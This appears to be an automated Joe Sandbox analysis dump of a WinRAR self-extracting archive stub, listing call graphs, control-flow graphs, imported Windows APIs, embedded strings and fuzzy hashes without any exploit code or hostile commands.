AllocConsole 28152->28154 28153->27989 28156 7ff7e1dce755 GetCurrentProcessId AttachConsole 28154->28156 28157 7ff7e1dce6fb 28154->28157 28155 7ff7e1db1fa0 31 API calls 28155->28158 28160 7ff7e1dce76c 28156->28160 28240 7ff7e1db19e0 31 API calls _invalid_parameter_noinfo_noreturn 28157->28240 28158->28129 28158->28144 28158->28150 28158->28155 28161 7ff7e1dc32bc 51 API calls 28158->28161 28162 7ff7e1dcaae0 48 API calls 28159->28162 28167 7ff7e1dce778 GetStdHandle WriteConsoleW Sleep FreeConsole 28160->28167 28161->28158 28164 7ff7e1dce6a5 28162->28164 28166 7ff7e1dcda98 48 API calls 28164->28166 28165 7ff7e1dce7b9 ExitProcess 28168 7ff7e1dce6c3 28166->28168 28167->28157 28169 7ff7e1dcaae0 48 API calls 28168->28169 28170 7ff7e1dce6ce 28169->28170 28238 7ff7e1dcdc2c 33 API calls 28170->28238 28172 7ff7e1dce6da 28239 7ff7e1db19e0 31 API calls _invalid_parameter_noinfo_noreturn 28172->28239 28175 7ff7e1dcdd88 28174->28175 28176 7ff7e1dd9481 OleInitialize 28175->28176 28177 7ff7e1dd94a7 28176->28177 28178 7ff7e1dd94cd SHGetMalloc 28177->28178 28178->27992 28180 7ff7e1dd9a49 28179->28180 28187 7ff7e1dd9a4e BuildCatchObjectHelperInternal 28179->28187 28181 7ff7e1db1fa0 31 API calls 28180->28181 28181->28187 28182 7ff7e1db1fa0 31 API calls 28183 7ff7e1dd9a7d BuildCatchObjectHelperInternal 28182->28183 28184 7ff7e1dd9aac BuildCatchObjectHelperInternal 28183->28184 28185 7ff7e1db1fa0 31 API calls 28183->28185 28186 7ff7e1db1fa0 31 API calls 28184->28186 28188 7ff7e1dd9adb BuildCatchObjectHelperInternal 28184->28188 28185->28184 28186->28188 28187->28182 28187->28183 28188->28000 28190 7ff7e1ddb03e 28189->28190 28194 7ff7e1ddb046 28189->28194 28242 7ff7e1dd8624 FindResourceW 28190->28242 28192 7ff7e1ddb063 28195 7ff7e1dd849c 4 API calls 28192->28195 28193 7ff7e1ddb04e GetObjectW 28193->28192 28194->28192 28194->28193 28196 7ff7e1ddb078 28195->28196 28197 7ff7e1ddb0ce 28196->28197 28198 7ff7e1ddb09e 28196->28198 28199 7ff7e1dd8624 10 API calls 28196->28199 28208 7ff7e1dc98ac 28197->28208 28256 7ff7e1dd8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28198->28256 28201 7ff7e1ddb08a 28199->28201 28201->28198 28203 7ff7e1ddb092 DeleteObject 28201->28203 28202 7ff7e1ddb0a7 28204 7ff7e1dd84cc 4 API calls 28202->28204 28203->28198 28205 7ff7e1ddb0b2 28204->28205 28257 7ff7e1dd8df4 16 API calls _handle_error 28205->28257 28207 7ff7e1ddb0bf DeleteObject 28207->28197 28258 7ff7e1dc98dc 28208->28258 28210 7ff7e1dc98ba 28325 7ff7e1dca43c GetModuleHandleW FindResourceW 28210->28325 28212 7ff7e1dc98c2 28212->28025 28214 7ff7e1de21d0 33 API calls 28213->28214 28215 7ff7e1dd67fa 28214->28215 28215->28035 28217 7ff7e1dd9501 28216->28217 28218 7ff7e1dd950a OleUninitialize 28217->28218 28219 7ff7e1e1e330 28218->28219 28220->28013 28221->28031 28222->28036 28223->28040 28224->28043 28225->28033 28226->28047 28227->28056 28229 7ff7e1dcdff4 GetModuleHandleW 28228->28229 28229->28100 28229->28101 28231 7ff7e1dc51c8 GetVersionExW 28230->28231 28232 7ff7e1dc51fb 28230->28232 28231->28232 28233 7ff7e1de2320 _handle_error 8 API calls 28232->28233 28234 7ff7e1dc5228 28233->28234 28234->28138 28235->28108 28236->28131 28237->28140 28238->28172 28239->28157 28240->28165 28241->28123 28243 7ff7e1dd864f SizeofResource 28242->28243 28245 7ff7e1dd879b 28242->28245 28244 7ff7e1dd8669 LoadResource 28243->28244 28243->28245 28244->28245 28246 7ff7e1dd8682 LockResource 28244->28246 28245->28194 28246->28245 28247 7ff7e1dd8697 GlobalAlloc 28246->28247 28247->28245 28248 7ff7e1dd86b8 GlobalLock 28247->28248 28249 7ff7e1dd8792 GlobalFree 28248->28249 28250 7ff7e1dd86ca BuildCatchObjectHelperInternal 28248->28250 28249->28245 28251 7ff7e1dd86f6 GdipAlloc 28250->28251 28252 7ff7e1dd8789 GlobalUnlock 28250->28252 28253 7ff7e1dd870b 28251->28253 28252->28249 28253->28252 28254 7ff7e1dd8772 28253->28254 28255 7ff7e1dd875a GdipCreateHBITMAPFromBitmap 28253->28255 28254->28252 28255->28254 28256->28202 28257->28207 28261 7ff7e1dc98fe _snwprintf 28258->28261 28259 7ff7e1dc9973 28335 7ff7e1dc68b0 48 API calls 28259->28335 28261->28259 28262 7ff7e1dc9a89 28261->28262 28265 7ff7e1dc99fd 28262->28265 28267 7ff7e1db20b0 33 API calls 28262->28267 28263 7ff7e1db1fa0 31 API calls 28263->28265 28264 7ff7e1dc997d BuildCatchObjectHelperInternal 28264->28263 28266 7ff7e1dca42e 28264->28266 28269 7ff7e1dc24c0 54 API calls 28265->28269 28268 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 28266->28268 28267->28265 28270 7ff7e1dca434 28268->28270 28271 7ff7e1dc9a1a 28269->28271 28272 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 28270->28272 28273 7ff7e1dc9a22 28271->28273 28281 7ff7e1dc9aad 28271->28281 28274 7ff7e1dca43a 28272->28274 28275 7ff7e1dc204c 100 API calls 28273->28275 28278 7ff7e1dc9a2b 28275->28278 28276 7ff7e1dc9b17 28327 7ff7e1dea450 28276->28327 28278->28270 28280 7ff7e1dc9a66 28278->28280 28283 7ff7e1de2320 _handle_error 8 API calls 28280->28283 28281->28276 28284 7ff7e1dc8e58 33 API calls 28281->28284 28282 7ff7e1dea450 31 API calls 28296 7ff7e1dc9b57 __vcrt_FlsAlloc 28282->28296 28285 7ff7e1dca40e 28283->28285 28284->28281 28285->28210 28286 7ff7e1dc9c89 28287 7ff7e1dc2aa0 101 API calls 28286->28287 28299 7ff7e1dc9d5c 28286->28299 28290 7ff7e1dc9ca1 28287->28290 28288 7ff7e1dc2bb0 101 API calls 28288->28296 28289 7ff7e1dc28d0 104 API calls 28289->28296 28293 7ff7e1dc28d0 104 API calls 28290->28293 28290->28299 28291 7ff7e1dc204c 100 API calls 28294 7ff7e1dca3f5 28291->28294 28292 7ff7e1dc2aa0 101 API calls 28292->28296 28297 7ff7e1dc9cc9 28293->28297 28295 7ff7e1db1fa0 31 API calls 28294->28295 28295->28280 28296->28286 28296->28288 28296->28289 28296->28292 28296->28299 28297->28299 28319 7ff7e1dc9cd7 __vcrt_FlsAlloc 28297->28319 28336 7ff7e1dd0bbc MultiByteToWideChar 28297->28336 28299->28291 28300 7ff7e1dca1ec 28315 7ff7e1dca2c2 28300->28315 28342 7ff7e1decf90 31 API calls 2 library calls 28300->28342 28302 7ff7e1dca157 28302->28300 28339 7ff7e1decf90 31 API calls 2 library calls 28302->28339 28303 7ff7e1dca14b 28303->28210 28306 7ff7e1dca3a2 28309 7ff7e1dea450 31 API calls 28306->28309 28307 7ff7e1dca249 28343 7ff7e1deb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28307->28343 28308 7ff7e1dca2ae 28308->28315 28344 7ff7e1dc8cd0 33 API calls 2 library calls 28308->28344 28312 7ff7e1dca3cb 28309->28312 28310 7ff7e1dc8e58 33 API calls 28310->28315 28313 7ff7e1dea450 31 API calls 28312->28313 28313->28299 28315->28306 28315->28310 28316 7ff7e1dca16d 28340 7ff7e1deb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28316->28340 28317 7ff7e1dca1d8 28317->28300 28341 7ff7e1dc8cd0 33 API calls 2 library calls 28317->28341 28319->28299 28319->28300 28319->28302 28319->28303 28320 7ff7e1dca429 28319->28320 28322 7ff7e1dd0f68 WideCharToMultiByte 28319->28322 28337 7ff7e1dcaa88 45 API calls _snwprintf 28319->28337 28338 7ff7e1dea270 31 API calls 2 library calls 28319->28338 28345 7ff7e1de2624 8 API calls 28320->28345 28322->28319 28326 7ff7e1dca468 28325->28326 28326->28212 28328 7ff7e1dea47d 28327->28328 28334 7ff7e1dea492 28328->28334 28346 7ff7e1ded69c 15 API calls abort 28328->28346 28330 7ff7e1dea487 28347 7ff7e1de78e4 31 API calls _invalid_parameter_noinfo_noreturn 28330->28347 28332 7ff7e1de2320 _handle_error 8 API calls 28333 7ff7e1dc9b37 28332->28333 28333->28282 28334->28332 28335->28264 28336->28319 28337->28319 28338->28319 28339->28316 28340->28317 28341->28300 28342->28307 28343->28308 28344->28315 28345->28266 28346->28330 28347->28334 28348 7ff7e1de0df5 14 API calls _com_raise_error 27884 7ff7e1de154b 27885 7ff7e1de14a2 27884->27885 27886 7ff7e1de1900 _com_raise_error 14 API calls 27885->27886 27887 7ff7e1de14e1 27886->27887 27889 7ff7e1ded94c 27890 7ff7e1ded997 27889->27890 27895 7ff7e1ded95b abort 27889->27895 27896 7ff7e1ded69c 15 API calls abort 27890->27896 27892 7ff7e1ded97e RtlAllocateHeap 27893 7ff7e1ded995 27892->27893 27892->27895 27894 7ff7e1debbc0 abort 2 API calls 27894->27895 27895->27890 27895->27892 27895->27894 27896->27893 28349 7ff7e1debf2c 28356 7ff7e1debc34 28349->28356 28361 7ff7e1ded440 35 API calls 2 library calls 28356->28361 28358 7ff7e1debc3f 28362 7ff7e1ded068 35 API calls abort 28358->28362 28361->28358
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
                    • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                    • API String ID: 3303814210-2702805183
                    • Opcode ID: f09fb21a4dca633731e21fa30c3b65a2e70867797e80f2e70a23c2b24a2a3025
                    • Instruction ID: dfcf4a5408783af4389680524db8da3e1cac605670b95f0692ddd9ea8f75c170
                    • Opcode Fuzzy Hash: f09fb21a4dca633731e21fa30c3b65a2e70867797e80f2e70a23c2b24a2a3025
                    • Instruction Fuzzy Hash: CFD29462E0868251EB20FB25E8527F9E351FF86784FC04237E98D466A5DFBCE544C722
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
                    • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                    • API String ID: 1830998149-3916287355
                    • Opcode ID: fcd01dd56a1b0d9a94054e53721844b88349af29849e6bffae24d093a89b8920
                    • Instruction ID: f975f5a2a6a60c6addcb0c6d6a5b07dd4774a9fd0e4ab2d50a69dd980179c957
                    • Opcode Fuzzy Hash: fcd01dd56a1b0d9a94054e53721844b88349af29849e6bffae24d093a89b8920
                    • Instruction Fuzzy Hash: 6E13B132B04B8299EB10EF64D8423EC67B5EB44398F800637DA5D57AD9DFB8E584C361

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1466 7ff7e1de0754-7ff7e1de0829 call 7ff7e1dcdfd0 call 7ff7e1dc62dc call 7ff7e1dd946c call 7ff7e1de3cf0 call 7ff7e1dd9a14 1477 7ff7e1de0860-7ff7e1de0883 1466->1477 1478 7ff7e1de082b-7ff7e1de0840 1466->1478 1479 7ff7e1de0885-7ff7e1de089a 1477->1479 1480 7ff7e1de08ba-7ff7e1de08dd 1477->1480 1481 7ff7e1de0842-7ff7e1de0855 1478->1481 1482 7ff7e1de085b call 7ff7e1de220c 1478->1482 1484 7ff7e1de08b5 call 7ff7e1de220c 1479->1484 1485 7ff7e1de089c-7ff7e1de08af 1479->1485 1486 7ff7e1de0914-7ff7e1de0937 1480->1486 1487 7ff7e1de08df-7ff7e1de08f4 1480->1487 1481->1482 1488 7ff7e1de0ddd-7ff7e1de0de2 call 7ff7e1de7904 1481->1488 1482->1477 1484->1480 1485->1484 1485->1488 1492 7ff7e1de096e-7ff7e1de097a GetCommandLineW 1486->1492 1493 7ff7e1de0939-7ff7e1de094e 1486->1493 1490 7ff7e1de08f6-7ff7e1de0909 1487->1490 1491 7ff7e1de090f call 7ff7e1de220c 1487->1491 1501 7ff7e1de0de3-7ff7e1de0df0 call 7ff7e1de7904 1488->1501 1490->1488 1490->1491 1491->1486 1496 7ff7e1de0980-7ff7e1de09b7 call 7ff7e1de797c call 7ff7e1db129c call 7ff7e1ddcad0 1492->1496 1497 7ff7e1de0b47-7ff7e1de0b5e call 7ff7e1dc6454 1492->1497 1499 7ff7e1de0950-7ff7e1de0963 1493->1499 1500 7ff7e1de0969 call 7ff7e1de220c 1493->1500 1525 7ff7e1de09ec-7ff7e1de09f3 1496->1525 1526 7ff7e1de09b9-7ff7e1de09cc 1496->1526 1510 7ff7e1de0b60-7ff7e1de0b85 call 7ff7e1db1fa0 call 7ff7e1de3640 1497->1510 1511 7ff7e1de0b89-7ff7e1de0ce4 call 7ff7e1db1fa0 SetEnvironmentVariableW GetLocalTime call 7ff7e1dc3e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff7e1ddb014 call 7ff7e1dc98ac call 7ff7e1dd67b4 * 2 DialogBoxParamW call 7ff7e1dd68a8 * 2 1497->1511 1499->1488 1499->1500 1500->1492 1513 7ff7e1de0df5-7ff7e1de0e2f call 7ff7e1de1900 1501->1513 1510->1511 1572 7ff7e1de0ce6 Sleep 1511->1572 1573 7ff7e1de0cec-7ff7e1de0cf3 1511->1573 1522 7ff7e1de0e34-7ff7e1de0eed 1513->1522 1522->1513 1532 7ff7e1de0adb-7ff7e1de0b12 call 7ff7e1de797c call 7ff7e1db129c call 7ff7e1ddfd0c 1525->1532 1533 7ff7e1de09f9-7ff7e1de0a13 OpenFileMappingW 1525->1533 1530 7ff7e1de09ce-7ff7e1de09e1 1526->1530 1531 7ff7e1de09e7 call 7ff7e1de220c 1526->1531 1530->1501 1530->1531 1531->1525 1532->1497 1555 7ff7e1de0b14-7ff7e1de0b27 1532->1555 1538 7ff7e1de0ad0-7ff7e1de0ad9 CloseHandle 1533->1538 1539 7ff7e1de0a19-7ff7e1de0a39 MapViewOfFile 1533->1539 1538->1497 1539->1538 1542 7ff7e1de0a3f-7ff7e1de0a6f UnmapViewOfFile MapViewOfFile 1539->1542 1542->1538 1543 7ff7e1de0a71-7ff7e1de0aca call 7ff7e1dda190 call 7ff7e1ddfd0c call 7ff7e1dcb9b4 call 7ff7e1dcbb00 call 7ff7e1dcbb70 UnmapViewOfFile 1542->1543 1543->1538 1558 7ff7e1de0b42 call 7ff7e1de220c 1555->1558 1559 7ff7e1de0b29-7ff7e1de0b3c 1555->1559 1558->1497 1559->1558 1562 7ff7e1de0dd7-7ff7e1de0ddc call 7ff7e1de7904 1559->1562 1562->1488 1572->1573 1575 7ff7e1de0cf5 call 7ff7e1dd9f4c 1573->1575 1576 7ff7e1de0cfa-7ff7e1de0d1d call 7ff7e1dcb8e0 DeleteObject 1573->1576 1575->1576 1581 7ff7e1de0d25-7ff7e1de0d2c 1576->1581 1582 7ff7e1de0d1f DeleteObject 1576->1582 1583 7ff7e1de0d2e-7ff7e1de0d35 1581->1583 1584 7ff7e1de0d48-7ff7e1de0d59 1581->1584 1582->1581 1583->1584 1585 7ff7e1de0d37-7ff7e1de0d43 call 7ff7e1dbba0c 1583->1585 1586 7ff7e1de0d5b-7ff7e1de0d67 call 7ff7e1ddfe24 CloseHandle 1584->1586 1587 7ff7e1de0d6d-7ff7e1de0d7a 1584->1587 1585->1584 1586->1587 1588 7ff7e1de0d9f-7ff7e1de0da4 call 7ff7e1dd94e4 1587->1588 1589 7ff7e1de0d7c-7ff7e1de0d89 1587->1589 1598 7ff7e1de0da9-7ff7e1de0dd6 call 7ff7e1de2320 1588->1598 1592 7ff7e1de0d8b-7ff7e1de0d93 1589->1592 1593 7ff7e1de0d99-7ff7e1de0d9b 1589->1593 1592->1588 1596 7ff7e1de0d95-7ff7e1de0d97 1592->1596 1593->1588 1597 7ff7e1de0d9d 1593->1597 1596->1588 1597->1588
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                    • API String ID: 1048086575-3710569615
                    • Opcode ID: 7fb843965e060d2caf1f274bd47349aa60f49b36b68f6f054b76b7ae27a5abf6
                    • Instruction ID: a43f67c0f35b3556dbf23a28419ace120a01a32d5f02701123d220c6063b7605
                    • Opcode Fuzzy Hash: 7fb843965e060d2caf1f274bd47349aa60f49b36b68f6f054b76b7ae27a5abf6
                    • Instruction Fuzzy Hash: 5A126361F0878681EB14EB24E8423BDA361FF85795FC04233E99D46AA5DFBCE150C362

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                    • String ID: $%s:$CAPTION
                    • API String ID: 1936833115-404845831
                    • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                    • Instruction ID: 43b49b4ab56f4fa633e380e361a4aab2923713e99a88a80733b5b24b6bbe2a94
                    • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                    • Instruction Fuzzy Hash: 0791FA32B186418AE718EF29E4117A9E7A1FB84784F805536FE8D47B58DF7CE805CB50

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                    • String ID: PNG
                    • API String ID: 541704414-364855578
                    • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                    • Instruction ID: e81c8d6bf1329070feab138793c5df481151aaf3471e8770ea320a9c26467769
                    • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                    • Instruction Fuzzy Hash: 06417225B09B0291EF15EB16D845379E3A0BF88B91F884536DD0D47368EFBCE5A4C322
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID: __tmp_reference_source_
                    • API String ID: 3668304517-685763994
                    • Opcode ID: ee1b9b2f793652c4fffa685adae4afd38ebba44b70748007b51654422c3c5d5b
                    • Instruction ID: 743f1a66cde0c63f240b3100881c504cd6bf5b529f9b8691d02942fc2c18ae02
                    • Opcode Fuzzy Hash: ee1b9b2f793652c4fffa685adae4afd38ebba44b70748007b51654422c3c5d5b
                    • Instruction Fuzzy Hash: BAE2D466A086C692EB64EB25D0423FEE761FB81780F804533DB9D036A5CFBCE454C762
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID: CMT
                    • API String ID: 3668304517-2756464174
                    • Opcode ID: b72a447c2ddb22f05185b9639a81e7227c320d37a75114c120090eb22b33af98
                    • Instruction ID: 2055b661071515e3e76b408df283505bea5e2914f2f46cb74181ede1e5bd8f0d
                    • Opcode Fuzzy Hash: b72a447c2ddb22f05185b9639a81e7227c320d37a75114c120090eb22b33af98
                    • Instruction Fuzzy Hash: 49E20462B08682A6EB18EB65D0527FDE7A1FB45384F800537DA5F43696CFBCE055C322

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3479 7ff7e1dc40bc-7ff7e1dc40f3 3480 7ff7e1dc41d2-7ff7e1dc41df FindNextFileW 3479->3480 3481 7ff7e1dc40f9-7ff7e1dc4101 3479->3481 3484 7ff7e1dc41e1-7ff7e1dc41f1 GetLastError 3480->3484 3485 7ff7e1dc41f3-7ff7e1dc41f6 3480->3485 3482 7ff7e1dc4106-7ff7e1dc4118 FindFirstFileW 3481->3482 3483 7ff7e1dc4103 3481->3483 3482->3485 3486 7ff7e1dc411e-7ff7e1dc4146 call 7ff7e1dc6a0c 3482->3486 3483->3482 3487 7ff7e1dc41ca-7ff7e1dc41cd 3484->3487 3488 7ff7e1dc4211-7ff7e1dc4253 call 7ff7e1de797c call 7ff7e1db129c call 7ff7e1dc8090 3485->3488 3489 7ff7e1dc41f8-7ff7e1dc4200 3485->3489 3499 7ff7e1dc4148-7ff7e1dc4164 FindFirstFileW 3486->3499 3500 7ff7e1dc4167-7ff7e1dc4170 3486->3500 3491 7ff7e1dc42eb-7ff7e1dc430e call 7ff7e1de2320 3487->3491 3515 7ff7e1dc4255-7ff7e1dc426c 3488->3515 3516 7ff7e1dc428c-7ff7e1dc42e6 call 7ff7e1dcf168 * 3 3488->3516 3493 7ff7e1dc4202 3489->3493 3494 7ff7e1dc4205-7ff7e1dc420c call 7ff7e1db20b0 3489->3494 3493->3494 3494->3488 3499->3500 3503 7ff7e1dc4172-7ff7e1dc4189 3500->3503 3504 7ff7e1dc41a9-7ff7e1dc41ad 3500->3504 3506 7ff7e1dc41a4 call 7ff7e1de220c 3503->3506 3507 7ff7e1dc418b-7ff7e1dc419e 3503->3507 3504->3485 3508 7ff7e1dc41af-7ff7e1dc41be GetLastError 3504->3508 3506->3504 3507->3506 3510 7ff7e1dc4315-7ff7e1dc431b call 7ff7e1de7904 3507->3510 3512 7ff7e1dc41c0-7ff7e1dc41c6 3508->3512 3513 7ff7e1dc41c8 3508->3513 3512->3487 3512->3513 3513->3487 3518 7ff7e1dc4287 call 7ff7e1de220c 3515->3518 3519 7ff7e1dc426e-7ff7e1dc4281 3515->3519 3516->3491 3518->3516 3519->3518 3522 7ff7e1dc430f-7ff7e1dc4314 call 7ff7e1de7904 3519->3522 3522->3510
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
